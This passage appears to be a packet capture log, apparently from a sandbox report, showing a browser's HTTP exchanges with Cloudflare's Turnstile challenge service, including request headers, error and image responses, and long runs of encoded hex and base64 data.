VIybWnuVlnpde2d0lWV/qIKKjqyckWuOiHKFhqZ6dJuooLyQwJe+fqDIxL6ElcartsLMoITJnMGPpZHBzqapldayvri70OC2vNzX5bbDts3W78PpsM7E6rP3+Nr0s7r35ugC98/i/toI2fbExPwCAvnc/e8CA84C5vEC1+7l9wnW1fAW8eMP/RYHCRITIAQjJigIGhIMNi3uAfcaFfYLOxcWD/gBEfxHEDIjNj8MFUVPSVBMOxFCVhckJic0JBs
2025-01-15 19:06:00 UTC	1369	IN	Data Raw: 58 2b 54 67 47 42 32 6c 57 46 6c 68 6f 6c 68 6d 33 75 77 63 58 32 6b 6a 4b 57 67 69 59 4b 78 71 5a 43 73 76 5a 4b 4e 77 62 57 37 6b 4c 57 35 6e 72 61 37 69 61 6d 4d 78 73 43 75 6e 63 75 4c 6b 63 4b 6b 30 73 33 4a 71 64 4f 72 76 4b 36 73 32 63 72 43 74 4f 48 52 73 74 75 77 31 36 50 71 71 39 62 64 75 4f 33 6f 72 2b 58 55 7a 4f 6d 30 34 4d 66 59 36 64 50 30 33 37 2f 49 33 4f 37 6b 37 39 44 44 38 4c 2f 37 35 2b 6f 47 34 67 2f 48 42 51 76 73 32 2b 54 6e 44 67 54 6d 39 65 6e 74 35 2f 7a 76 45 4e 30 55 37 2b 34 6d 2b 68 6e 77 2b 50 73 73 4a 79 49 4b 4c 65 77 6c 36 69 41 6d 46 44 63 42 4f 43 33 31 42 50 6f 78 4e 41 38 4b 44 77 49 32 52 44 59 2f 42 53 49 34 4b 69 68 48 53 69 77 49 49 51 6b 62 51 42 49 6f 55 52 59 6e 51 52 6c 54 53 69 77 36 47 45 6b 2f 4d 54 41 34 Data Ascii: X+TgGB2lWFlholhm3uwcX2kjKWgiYKxqZCsvZKNwbW7kLW5nra7iamMxsCuncuLkcKk0s3JqdOrvK6s2crCtOHRstuw16Pqq9bduO3or+XUzOm04MfY6dP037/I3O7k79DD8L/75+oG4g/HBQvs2+TnDgTm9ent5/zvEN0U7+4m+hnw+PssJyIKLewl6iAmFDcBOC31BPoxNA8KDwI2RDY/BSI4KihHSiwIIQkbQBIoURYnQRlTSiw6GEk/MTA4
2025-01-15 19:06:00 UTC	1369	IN	Data Raw: 69 65 6e 34 36 65 73 49 43 4f 6f 4a 43 42 69 61 36 70 6a 6f 71 71 6e 4c 70 36 6e 4c 36 4d 73 4c 43 62 77 62 79 44 6f 49 69 6b 75 70 75 68 77 4c 32 77 6b 49 54 52 70 39 4b 31 77 73 72 42 74 4d 53 7a 33 63 32 37 73 74 66 69 7a 73 4c 6d 78 37 37 52 35 64 54 4c 78 4c 57 71 76 37 37 41 30 4b 36 78 72 4e 48 54 34 38 4c 79 38 75 76 73 37 73 72 35 30 2f 6e 79 76 66 48 36 33 64 58 31 35 2b 6e 6a 2f 67 4c 72 32 65 4d 43 7a 77 37 6e 36 2b 4c 76 44 50 4d 4b 33 50 7a 61 47 2f 34 53 42 41 30 5a 42 75 58 35 43 67 41 42 34 52 62 71 42 67 37 39 48 2b 6b 75 37 67 6b 6d 4c 52 72 30 4e 43 77 37 39 69 67 7a 2f 43 76 36 4c 7a 59 6a 51 79 6c 44 49 67 4c 39 42 51 5a 44 51 79 56 52 44 56 49 31 44 6b 74 51 46 56 42 55 44 6c 4e 49 4c 55 6c 43 54 7a 45 6a 51 44 41 66 5a 56 73 33 51 Data Ascii: ien46esICOoJCBia6pjoqqnLp6nL6MsLCbwbyDoIikupuhwL2wkITRp9K1wsrBtMSz3c27stfizsLmx77R5dTLxLWqv77A0K6xrNHT48Ly8uvs7sr50/nyvfH63dX15+nj/gLr2eMCzw7n6+LvDPMK3PzaG/4SBA0ZBuX5CgAB4RbqBg79H+ku7gkmLRr0NCw79igz/Cv6LzYjQylDIgL9BQZDQyVRDVI1DktQFVBUDlNILUlCTzEjQDAfZVs3Q
2025-01-15 19:06:00 UTC	1369	IN	Data Raw: 75 6d 36 53 68 73 61 47 50 69 48 47 79 70 36 65 50 70 33 32 58 73 70 61 63 72 36 2b 42 6c 73 61 4a 75 34 54 4a 75 61 4c 49 67 36 7a 46 76 73 48 4a 77 4c 61 79 31 61 71 6c 30 70 65 30 74 72 4f 34 6d 74 48 54 6f 4b 47 67 34 62 62 73 75 72 37 69 79 63 6e 69 75 38 65 38 38 4d 44 51 39 2b 48 71 32 4d 7a 39 75 76 59 42 39 50 6f 46 32 4e 2f 62 75 51 62 70 2b 2f 76 37 37 75 33 69 32 4d 76 72 42 67 4c 51 31 75 77 57 44 38 77 64 38 50 54 56 32 79 41 59 42 4f 34 5a 35 65 51 42 34 51 55 48 36 41 45 69 35 43 55 70 2b 69 38 4b 38 53 49 43 46 41 50 72 42 42 6b 4c 48 78 4d 4a 38 76 77 79 49 45 49 57 2f 53 63 35 4b 52 55 2b 42 45 59 49 4f 79 63 4b 48 79 39 47 46 69 67 35 55 46 4d 6b 54 54 6b 61 58 55 34 74 4c 7a 64 53 5a 6a 4a 6b 49 44 4d 34 51 46 74 6c 61 30 4d 2f 50 6d Data Ascii: um6ShsaGPiHGyp6ePp32Xspacr6+BlsaJu4TJuaLIg6zFvsHJwLay1aql0pe0trO4mtHToKGg4bbsur7iycniu8e88MDQ9+Hq2Mz9uvYB9PoF2N/buQbp+/v77u3i2MvrBgLQ1uwWD8wd8PTV2yAYBO4Z5eQB4QUH6AEi5CUp+i8K8SICFAPrBBkLHxMJ8vwyIEIW/Sc5KRU+BEYIOycKHy9GFig5UFMkTTkaXU4tLzdSZjJkIDM4QFtla0M/Pm
2025-01-15 19:06:00 UTC	1369	IN	Data Raw: 67 5a 61 61 65 70 61 2f 71 4a 71 55 77 59 31 2f 70 63 65 58 6e 59 47 31 79 36 62 4c 7a 70 71 77 6d 62 2b 6a 6b 61 37 58 6a 74 62 49 78 64 61 4f 78 71 6a 55 6b 74 79 76 73 61 36 33 73 38 48 43 76 4f 66 67 33 61 75 74 34 65 7a 74 75 73 2b 38 35 4c 48 7a 36 4d 6e 4f 78 4f 6e 6e 78 76 62 41 41 4d 7a 65 2b 72 79 38 34 73 50 62 33 65 51 43 2f 41 55 44 37 67 76 67 46 66 4c 6e 33 38 37 35 30 67 76 72 38 65 2f 71 33 51 49 6a 37 2f 58 61 49 65 51 59 35 41 45 41 34 64 37 35 47 65 30 74 41 42 45 72 46 41 77 34 49 41 48 72 4b 68 67 36 39 77 6b 76 4c 6a 6f 44 52 42 30 45 4e 7a 4d 56 41 78 4e 4a 53 67 6f 34 49 45 55 50 49 6c 51 39 55 30 42 49 55 6b 59 37 4e 7a 4e 4c 4d 68 49 31 58 45 34 34 52 46 42 66 49 53 56 69 61 45 70 68 59 7a 38 38 53 31 4e 6e 55 7a 35 6d 64 55 4e Data Ascii: gZaaepa/qJqUwY1/pceXnYG1y6bLzpqwmb+jka7XjtbIxdaOxqjUktyvsa63s8HCvOfg3aut4eztus+85LHz6MnOxOnnxvbAAMze+ry84sPb3eQC/AUD7gvgFfLn38750gvr8e/q3QIj7/XaIeQY5AEA4d75Ge0tABErFAw4IAHrKhg69wkvLjoDRB0ENzMVAxNJSgo4IEUPIlQ9U0BIUkY7NzNLMhI1XE44RFBfISViaEphYz88S1NnUz5mdUN
2025-01-15 19:06:00 UTC	1369	IN	Data Raw: 4c 79 61 72 5a 2f 42 6c 61 65 6b 77 4d 66 44 78 73 47 2f 6d 71 36 77 6e 63 72 4f 76 73 75 74 73 38 75 55 30 64 62 59 31 37 43 38 33 35 50 57 74 62 79 35 30 71 2b 7a 6d 2b 6a 4c 75 4b 33 50 77 65 66 53 30 4f 58 51 77 63 71 30 79 50 6a 30 36 37 62 79 39 2b 66 41 38 38 44 52 74 67 44 46 39 77 67 46 78 77 7a 33 44 65 4c 61 34 41 77 47 7a 38 59 52 33 73 37 6b 30 38 77 4a 42 64 6a 79 46 42 33 63 2f 75 2f 35 45 76 59 52 38 76 72 70 4a 51 48 6d 35 4f 55 63 36 43 34 78 44 2b 37 6f 4b 53 59 37 45 67 38 4f 50 42 44 37 39 68 34 4e 50 43 59 6d 48 67 51 53 48 7a 30 67 42 79 49 62 4a 45 30 6d 51 78 4d 4d 4b 30 73 71 51 55 51 54 4c 53 6c 53 46 78 73 73 4e 69 35 53 59 7a 6c 5a 4e 43 68 4c 50 44 30 72 54 45 42 4b 4f 6c 35 4c 55 45 78 41 4e 6c 4d 76 51 31 70 53 61 6e 46 6e Data Ascii: LyarZ/BlaekwMfDxsG/mq6wncrOvsuts8uU0dbY17C835PWtby50q+zm+jLuK3PwefS0OXQwcq0yPj067by9+fA88DRtgDF9wgFxwz3DeLa4AwGz8YR3s7k08wJBdjyFB3c/u/5EvYR8vrpJQHm5OUc6C4xD+7oKSY7Eg8OPBD79h4NPCYmHgQSHz0gByIbJE0mQxMMK0sqQUQTLSlSFxssNi5SYzlZNChLPD0rTEBKOl5LUExANlMvQ1pSanFn

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:06:01 UTC	599	OUT	GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1497844684:1736965888:hR1bQafLozQXnmaBH5lAypMI_u7ggQ5Cnikt2oePCQI/902823eb1c368c99/ae1BCWt9k0HcV1Stw.aqaNNjGsPp.vEgo6dugpndcQs-1736967958-1.1.1.1-SrGUcSV2bImxYiTTejixzDrtDboHC6MPNX7hfWvhi72sA8.3NMOByHbV8EB8W0OX HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 19:06:01 UTC	442	IN	HTTP/1.1 400 Bad Request Date: Wed, 15 Jan 2025 19:06:01 GMT Content-Type: application/json Content-Length: 14 Connection: close cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 cf-chl-out: kSWJhSKY7SBwKNF+URYiIsK/hvKE0nmXiIoPexnK93Gct496yvpW6/jtPjwv+5HwPopO9BHtSHbAzn4LtjCRsg==$OZCVLAcpdd82bijTJsrM2Q== Server: cloudflare CF-RAY: 902823fcced31831-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 19:06:01 UTC	14	IN	Data Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d Data Ascii: {"err":100230}

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:06:01 UTC	811	OUT	GET /cdn-cgi/challenge-platform/h/b/pat/902823eb1c368c99/1736967959959/12ed8f27cd128fe67bd2821f7dc95d58c918c3876a33e3c66d9bc91bc3837de7/WmSt7LN2AskYnSv HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive Cache-Control: max-age=0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/5ourm/0x4AAAAAAA44TVMLbqDkCk-m/auto/fbE/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 19:06:01 UTC	143	IN	HTTP/1.1 401 Unauthorized Date: Wed, 15 Jan 2025 19:06:01 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 1 Connection: close
2025-01-15 19:06:01 UTC	2015	IN	Data Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 45 75 32 50 4a 38 30 53 6a 2d 5a 37 30 6f 49 66 66 63 6c 64 57 4d 6b 59 77 34 64 71 4d 2d 50 47 62 5a 76 4a 47 38 4f 44 66 65 63 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gEu2PJ80Sj-Z70oIffcldWMkYw4dqM-PGbZvJG8ODfecAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
2025-01-15 19:06:01 UTC	1	IN	Data Raw: 4a Data Ascii: J

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:06:02 UTC	782	OUT	GET /cdn-cgi/challenge-platform/h/b/i/902823eb1c368c99/1736967959960/79oBvcNDV_Yq-3G HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/5ourm/0x4AAAAAAA44TVMLbqDkCk-m/auto/fbE/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 19:06:02 UTC	200	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 19:06:02 GMT Content-Type: image/png Content-Length: 61 Connection: close Server: cloudflare CF-RAY: 902824078b101881-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 19:06:02 UTC	61	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1c 00 00 00 43 08 02 00 00 00 00 b7 f2 e1 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: PNGIHDRCIDAT$IENDB`

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:06:03 UTC	428	OUT	GET /cdn-cgi/challenge-platform/h/b/i/902823eb1c368c99/1736967959960/79oBvcNDV_Yq-3G HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 19:06:03 UTC	200	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 19:06:03 GMT Content-Type: image/png Content-Length: 61 Connection: close Server: cloudflare CF-RAY: 9028240c0e2d7d18-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 19:06:03 UTC	61	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1c 00 00 00 43 08 02 00 00 00 00 b7 f2 e1 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: PNGIHDRCIDAT$IENDB`

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:06:03 UTC	1172	OUT	POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1497844684:1736965888:hR1bQafLozQXnmaBH5lAypMI_u7ggQ5Cnikt2oePCQI/902823eb1c368c99/ae1BCWt9k0HcV1Stw.aqaNNjGsPp.vEgo6dugpndcQs-1736967958-1.1.1.1-SrGUcSV2bImxYiTTejixzDrtDboHC6MPNX7hfWvhi72sA8.3NMOByHbV8EB8W0OX HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive Content-Length: 32322 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Content-type: application/x-www-form-urlencoded CF-Chl-RetryAttempt: 0 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 CF-Challenge: ae1BCWt9k0HcV1Stw.aqaNNjGsPp.vEgo6dugpndcQs-1736967958-1.1.1.1-SrGUcSV2bImxYiTTejixzDrtDboHC6MPNX7hfWvhi72sA8.3NMOByHbV8EB8W0OX sec-ch-ua-platform: "Windows" Accept: / Origin: https://challenges.cloudflare.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/5ourm/0x4AAAAAAA44TVMLbqDkCk-m/auto/fbE/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 19:06:03 UTC	16384	OUT	Data Raw: 76 5f 39 30 32 38 32 33 65 62 31 63 33 36 38 63 39 39 3d 2d 68 48 59 52 5a 25 32 62 69 72 45 68 43 68 43 57 68 2b 4b 2b 45 49 4c 77 69 65 61 43 42 46 43 4f 59 30 48 65 39 43 59 56 4d 43 5a 72 65 5a 43 34 52 43 37 48 65 49 43 54 59 2b 50 4d 48 59 43 57 48 43 35 6e 59 65 73 43 35 50 2b 71 43 24 59 50 2b 37 43 32 47 6c 51 71 43 5a 68 43 37 43 48 6f 33 45 73 59 41 78 52 69 35 45 74 4b 6b 6b 49 6f 37 59 4b 33 43 64 59 65 64 73 49 38 43 41 47 62 43 41 4c 5a 36 2b 74 4e 4a 59 59 43 65 24 43 65 54 48 43 43 61 33 59 4c 43 78 64 72 43 24 72 34 4a 2b 43 39 38 48 59 65 36 78 55 6c 74 45 58 4b 35 43 2b 32 38 78 4a 41 74 39 72 72 50 43 45 47 73 61 4b 24 2b 5a 48 56 50 43 48 46 6b 33 59 73 45 4e 30 59 50 33 59 67 44 6c 54 58 75 43 35 56 67 6e 6d 35 4f 52 69 61 6e 6b 39 Data Ascii: v_902823eb1c368c99=-hHYRZ%2birEhChCWh+K+EILwieaCBFCOY0He9CYVMCZreZC4RC7HeICTY+PMHYCWHC5nYesC5P+qC$YP+7C2GlQqCZhC7CHo3EsYAxRi5EtKkkIo7YK3CdYedsI8CAGbCALZ6+tNJYYCe$CeTHCCa3YLCxdrC$r4J+C98HYe6xUltEXK5C+28xJAt9rrPCEGsaK$+ZHVPCHFk3YsEN0YP3YgDlTXuC5Vgnm5ORiank9
2025-01-15 19:06:03 UTC	15938	OUT	Data Raw: 49 2b 45 43 4b 59 49 44 65 4c 2b 59 2b 4b 2b 41 43 39 24 4f 57 65 43 77 48 43 52 4c 72 59 35 48 43 38 43 2b 73 35 59 5a 36 43 41 59 24 72 2b 44 43 4e 59 37 72 5a 41 43 49 43 5a 73 43 71 43 2d 59 77 47 2b 4c 43 53 59 45 46 47 4b 43 57 59 5a 76 78 77 62 33 61 34 48 2b 44 43 43 43 24 34 36 69 61 59 4b 4a 5a 4c 43 6c 66 73 57 2b 44 43 6a 33 30 58 5a 33 43 42 59 35 59 4b 4d 62 7a 66 56 59 5a 71 43 6e 69 24 74 65 4b 2b 61 43 6d 73 34 35 47 65 48 5a 77 5a 4b 2b 48 33 79 77 2b 44 43 47 4c 30 59 5a 24 50 74 59 2b 50 24 45 2b 34 59 2d 47 65 6f 43 70 59 79 47 2b 41 43 47 43 2b 37 43 6f 43 58 4c 32 68 2b 63 59 37 59 30 4a 38 42 49 74 50 43 4c 5a 4b 2b 33 66 4e 63 7a 4b 2b 67 66 64 59 2b 72 43 41 43 65 59 43 44 33 47 59 35 50 5a 48 59 75 43 2d 72 2b 4d 64 6f 43 48 50 Data Ascii: I+ECKYIDeL+Y+K+AC9$OWeCwHCRLrY5HC8C+s5YZ6CAY$r+DCNY7rZACICZsCqC-YwG+LCSYEFGKCWYZvxwb3a4H+DCCC$46iaYKJZLClfsW+DCj30XZ3CBY5YKMbzfVYZqCni$teK+aCms45GeHZwZK+H3yw+DCGL0YZ$PtY+P$E+4Y-GeoCpYyG+ACGC+7CoCXL2h+cY7Y0J8BItPCLZK+3fNczK+gfdY+rCACeYCD3GY5PZHYuC-r+MdoCHP
2025-01-15 19:06:03 UTC	322	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 19:06:03 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 26316 Connection: close cf-chl-gen: LH9wyjFYOblTmUBTCeC7Ki2YGeaqKLHHpOjLFRx1stPSpaYF54gzw1tnX1Vq6wHW$I4arGgqYSQS/RsRmWimKUg== Server: cloudflare CF-RAY: 9028240c48838cdc-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 19:06:03 UTC	1047	IN	Data Raw: 76 49 43 72 75 4c 2b 6b 6a 73 61 79 67 59 47 46 75 5a 32 39 71 61 2b 2b 71 63 4b 6d 78 4d 66 47 71 73 6e 44 32 36 76 4e 72 5a 53 31 6f 4c 4f 5a 30 37 6e 58 70 62 62 42 34 38 53 34 36 37 69 70 72 38 7a 44 34 63 32 73 78 73 7a 57 78 64 4c 4f 31 39 6e 35 2f 73 76 38 38 4d 48 39 2b 39 66 6c 2b 76 33 42 36 73 4d 4e 33 38 37 34 37 2b 49 4d 42 4f 58 6f 46 66 48 70 47 75 58 32 45 76 72 78 46 51 6f 51 47 75 73 59 31 79 63 63 45 52 37 2b 4b 41 6f 68 4c 77 73 70 49 51 44 70 43 2f 50 32 38 53 59 4e 38 2f 6b 36 4c 2f 44 31 47 6a 41 5a 2f 6a 6f 44 50 55 45 78 42 77 49 37 44 41 77 76 51 53 46 50 53 45 52 4f 50 6b 74 43 4d 79 59 52 53 68 64 49 47 7a 64 63 4f 6a 39 65 52 47 59 77 56 7a 67 71 48 56 70 4a 59 6a 78 66 5a 6a 78 6c 58 30 64 6a 4d 6e 68 6d 62 33 5a 33 55 6b 6c Data Ascii: vICruL+kjsaygYGFuZ29qa++qcKmxMfGqsnD26vNrZS1oLOZ07nXpbbB48S467ipr8zD4c2sxszWxdLO19n5/sv88MH9+9fl+v3B6sMN38747+IMBOXoFfHpGuX2EvrxFQoQGusY1yccER7+KAohLwspIQDpC/P28SYN8/k6L/D1GjAZ/joDPUExBwI7DAwvQSFPSEROPktCMyYRShdIGzdcOj9eRGYwVzgqHVpJYjxfZjxlX0djMnhmb3Z3Ukl
2025-01-15 19:06:03 UTC	1369	IN	Data Raw: 54 6f 36 61 4e 30 38 54 46 70 4c 54 63 7a 63 65 61 7a 4c 48 4b 77 74 50 6a 6f 64 62 64 79 71 62 6f 32 4c 6a 61 79 36 6e 63 36 73 62 4a 71 2b 62 45 78 4e 4c 4c 74 73 58 64 31 76 50 4f 38 50 62 4e 39 4d 2f 59 35 66 7a 6b 31 41 72 32 39 38 62 64 33 74 48 39 43 41 48 4f 45 68 50 34 31 65 58 71 35 50 7a 58 46 67 6b 54 49 66 55 6c 49 78 59 57 38 50 54 63 49 67 63 67 49 79 59 45 43 67 44 77 43 79 41 77 46 2f 41 7a 43 41 34 59 39 6a 49 6f 48 78 34 55 47 41 49 35 51 69 51 4a 48 6b 63 71 4e 53 51 38 44 53 59 6d 54 7a 42 56 4c 45 51 55 49 6c 52 49 4e 46 6f 62 53 69 73 70 57 6c 67 76 51 56 67 6d 59 54 6b 70 57 7a 73 6a 53 6c 34 6f 4c 6d 6f 70 50 32 35 52 4e 6c 4a 53 5a 33 63 34 53 6a 74 30 50 6d 78 72 54 59 46 4e 57 31 39 61 68 58 4a 49 65 49 57 41 66 6e 69 48 59 59 Data Ascii: To6aN08TFpLTczceazLHKwtPjodbdyqbo2Ljay6nc6sbJq+bExNLLtsXd1vPO8PbN9M/Y5fzk1Ar298bd3tH9CAHOEhP41eXq5PzXFgkTIfUlIxYW8PTcIgcgIyYECgDwCyAwF/AzCA4Y9jIoHx4UGAI5QiQJHkcqNSQ8DSYmTzBVLEQUIlRINFobSispWlgvQVgmYTkpWzsjSl4oLmopP25RNlJSZ3c4Sjt0PmxrTYFNW19ahXJIeIWAfniHYY
2025-01-15 19:06:03 UTC	1369	IN	Data Raw: 31 70 6e 4d 6d 39 2b 6e 6e 35 71 64 32 72 2b 6a 73 4f 66 64 30 36 4c 73 77 4e 2b 74 35 74 79 74 7a 71 2b 38 73 4b 6a 72 36 4e 48 71 33 4e 4c 5a 38 37 7a 34 32 72 33 50 77 4e 76 42 76 74 79 2f 34 50 76 66 78 51 59 44 43 42 49 45 30 67 33 76 46 67 41 49 31 66 45 61 38 4f 72 71 44 2b 30 65 44 76 73 55 37 65 55 61 4b 52 77 63 49 79 55 68 37 42 30 6d 41 69 34 41 45 44 49 56 43 53 6b 54 4d 50 63 78 4e 54 77 59 49 50 77 43 45 42 63 7a 49 77 41 34 49 79 59 62 47 69 67 73 4b 77 68 4a 50 69 51 75 4d 6b 78 4a 45 31 6f 5a 57 42 77 75 48 6a 59 62 4e 79 46 67 56 30 63 79 52 54 5a 67 4f 30 45 2b 61 6d 78 43 4b 6d 31 78 62 43 39 44 51 6c 46 73 62 6c 4a 4b 4e 44 34 38 64 6a 64 4d 58 6b 31 2b 4f 46 5a 6a 55 30 68 49 67 34 46 34 59 45 4a 50 65 6b 74 52 67 6d 35 58 6d 47 36 Data Ascii: 1pnMm9+nn5qd2r+jsOfd06LswN+t5tytzq+8sKjr6NHq3NLZ87z42r3PwNvBvty/4PvfxQYDCBIE0g3vFgAI1fEa8OrqD+0eDvsU7eUaKRwcIyUh7B0mAi4AEDIVCSkTMPcxNTwYIPwCEBczIwA4IyYbGigsKwhJPiQuMkxJE1oZWBwuHjYbNyFgV0cyRTZgO0E+amxCKm1xbC9DQlFsblJKND48djdMXk1+OFZjU0hIg4F4YEJPektRgm5XmG6
2025-01-15 19:06:03 UTC	1369	IN	Data Raw: 74 69 5a 6e 39 4b 36 70 64 6a 67 78 4e 4f 71 32 39 6a 6f 76 65 66 69 37 63 4c 6b 38 4e 58 59 37 76 71 32 36 2b 75 39 37 74 33 32 2b 74 37 66 7a 74 6a 77 43 4e 2f 78 33 50 62 72 32 2f 7a 62 7a 65 50 6e 79 51 2f 68 79 4f 2f 72 47 39 41 62 45 2b 62 79 38 4f 6e 2b 42 42 66 35 45 67 55 62 36 42 6f 49 43 68 58 6a 49 68 44 6e 49 79 41 66 46 69 63 47 37 67 6b 4e 38 2f 4d 64 44 44 34 79 2b 44 38 4c 4d 6a 45 31 4b 42 41 45 4b 44 63 6c 52 55 51 59 4c 42 34 68 42 56 49 71 4d 54 63 31 46 55 5a 57 50 53 34 34 48 45 30 36 57 6c 4e 62 4f 54 38 78 53 54 46 6e 51 56 77 2f 62 46 70 75 53 44 4a 30 54 53 78 6d 53 79 34 34 52 7a 4a 64 53 31 4a 38 4f 58 77 35 5a 48 46 68 55 58 78 53 69 48 5a 69 62 45 5a 34 57 6d 56 35 66 58 78 31 67 46 47 51 64 57 75 43 62 31 74 63 6c 49 79 42 Data Ascii: tiZn9K6pdjgxNOq29jovefi7cLk8NXY7vq26+u97t32+t7fztjwCN/x3Pbr2/zbzePnyQ/hyO/rG9AbE+by8On+BBf5EgUb6BoIChXjIhDnIyAfFicG7gkN8/MdDD4y+D8LMjE1KBAEKDclRUQYLB4hBVIqMTc1FUZWPS44HE06WlNbOT8xSTFnQVw/bFpuSDJ0TSxmSy44RzJdS1J8OXw5ZHFhUXxSiHZibEZ4WmV5fXx1gFGQdWuCb1tclIyB
2025-01-15 19:06:03 UTC	1369	IN	Data Raw: 57 36 70 71 58 61 35 61 62 76 36 63 6a 6d 72 4f 6e 63 71 38 7a 49 31 63 2b 79 30 73 2f 6f 30 4e 50 68 76 65 76 34 41 41 50 79 31 67 54 43 38 67 48 33 43 50 66 2b 43 68 4c 68 37 2f 58 70 45 77 34 43 43 4f 66 30 2f 41 6f 41 38 51 6b 57 37 66 76 75 46 41 41 6c 34 43 51 46 48 67 6e 31 46 77 48 6e 45 43 50 72 45 41 77 71 4b 42 51 6a 46 2f 55 46 4b 2f 63 32 45 77 41 59 46 66 77 32 41 78 38 45 4a 41 4d 69 53 45 68 42 49 68 38 77 52 30 70 4e 50 6c 4d 55 51 55 35 61 47 7a 64 4d 57 46 63 2f 54 46 73 30 48 6a 70 6c 4a 6d 46 6c 57 31 55 71 5a 47 42 71 52 45 4a 70 62 47 46 67 61 55 70 35 63 6e 4d 37 61 57 35 77 50 48 6c 73 64 32 31 2b 55 58 70 78 64 59 65 45 52 30 70 47 69 6b 75 4a 69 34 64 52 5a 47 57 4f 6a 31 64 6e 6b 70 4b 5a 6a 4a 70 65 6f 58 2b 58 6e 59 32 55 6e Data Ascii: 